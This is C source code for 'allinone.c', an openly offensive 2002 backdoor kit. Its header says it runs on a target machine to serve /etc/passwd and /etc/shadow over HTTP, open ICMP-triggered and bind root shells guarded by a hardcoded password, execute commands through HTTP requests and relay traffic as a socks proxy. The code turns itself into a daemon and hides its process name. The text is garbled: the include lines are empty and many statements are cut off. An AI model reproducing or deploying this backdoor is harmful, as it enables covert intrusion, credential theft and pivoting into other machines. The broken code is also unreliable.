/************************************************************************
* allinone.c for HUC(2002)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) -- your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) -- your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) -- your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC, Http://www.cnhonker.net
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define HTTPD_PORT 8008
#define BIND_PORT 8888
#define ICMP_PORT 8080
#define TRAN_PORT 1080
#define SIZEPACK 101
#define MAXSIZE 32768
#define TIMEOUT 120
#define CONNECT_NUMBER 1
#define HIDEME "[login] "
#define HIDEICMP "[su] "
#define HIDEFILE "[bash] "
#define GET_FILE "givemefile"
#define SHELL_NAME "givemeshell"
#define BIND_NAME "bindport"
#define TRAN_NAME "socks"
#define DISPART ":"
#define DISPART1 "::"
#define DISPART2 ":::"
#define PASSWORD "kissme:)"
#define MESSAGE "\r\n========Welcome to http://www.cnhonker.net========\r\n==========You get it, have a goodluck. :)=========\r\n\r\nYour command: \0"
#define GIVEPASS "\r\nEnter Your password: \0"
#define max(a, b) (a)(b)?(a) : (b)
int maxfd, infd, outfd;
unsigned char ret_buf[32768];
int daemon_init(); /* init the daemon, if success return 0 other
void sig_chid(); /* wait the child die */
int TCP_listen(); /* success return 1 else return -1 */
char * read_file(); /* return the file content as a large string, buf value like GET /index.html HTTP:/1.1 */
ssize_t writen_file(); /* writen data to socket */
int bind_shell(); /* bind a root shell to a port */
int get_shell(); /* get me the root shell */
int icmp_shell(); /* icmp backdoor */
int socks(); /* socks */
int create_socket();
int create_serv();
int client_connect();
int quit();
void out2in();
char x2c(); /* http shell */
void unescape_url();
void plustospace();
/* The main function from here */
int main(int argc, char *argv[])
{
int fd, len, i, icmp;
int csocket;
struct sockaddr_in caddr;
char readstr[4000];
char *cbuf;
pid_t pid;
/* make it to a daemon */
/*signal(SIGHUP, SIG_IGN);*/
signal(SIGCHLD, sig_chid);
daemon_init();
if((pid = fork()) == -1) exit(0);
if(pid
{
strcpy(argv[0], HIDEICMP);
icmp_shell();
}
fd = TCP_listen(HTTPD_PORT);
if(fd
for(;;)
{
strcpy(argv[0], HIDEME);
/* check httpd */
len = sizeof(caddr);
if((csocket = accept(fd, &caddr, &len))
if((pid = fork()) == -1) continue;
if(pid
{
strcpy (argv[0], HIDEFILE);
i = recv(csocket, readstr, 4000,0);
if (i == -1) break;
if( readstr[ i -1 ] != '\n' ) break;
readstr = '\0';
/*printf("Read from client: %s \n", readstr);*/
cbuf = read_file(readstr, csocket);
close(csocket);
}
close(csocket);
}
close(fd);
return(1);
}
/* init the daemon, if success return 0 other
int daemon_init()
{
struct sigaction act;
int i, maxfd;
if(fork() != 0) exit(0);
if(setsid()
act.sa_handler = SIG_IGN;
/*act.sa_mask = 0;*/
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
if(fork() != 0) exit(0);
chdir("/");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
/* wait the child die */
void sig_chid(int signo)
{
pid_t pid;
int stat;
while((pid = waitpid(-1, &stat, WNOHANG))0);
printf("children %d died\n", pid);
return;
}
/* success return 1 else return -1 */
int TCP_listen(int port)
{
struct sockaddr_in laddr ;
int fd;
socklen_t len ;
fd = socket(AF_INET, SOCK_STREAM, 0);
len = sizeof(laddr) ;
memset(&laddr, 0, len) ;
laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
laddr.sin_family = AF_INET ;
laddr.sin_port = htons(port) ;
if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
if(listen(fd, 5)) return(-1);
return(fd);
}
/* http server */
char * read_file(char *buf, int fd)
{
char *erro=
"Content-type: text/html\n\n"
"HTTP/1.1 404 Not Found\n"
"Date: Mon, 14 Jan 2002 03:19:55 GMT\n"
"Server: Apache/1.3.22 (Unix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
"\n"
"\n"
"
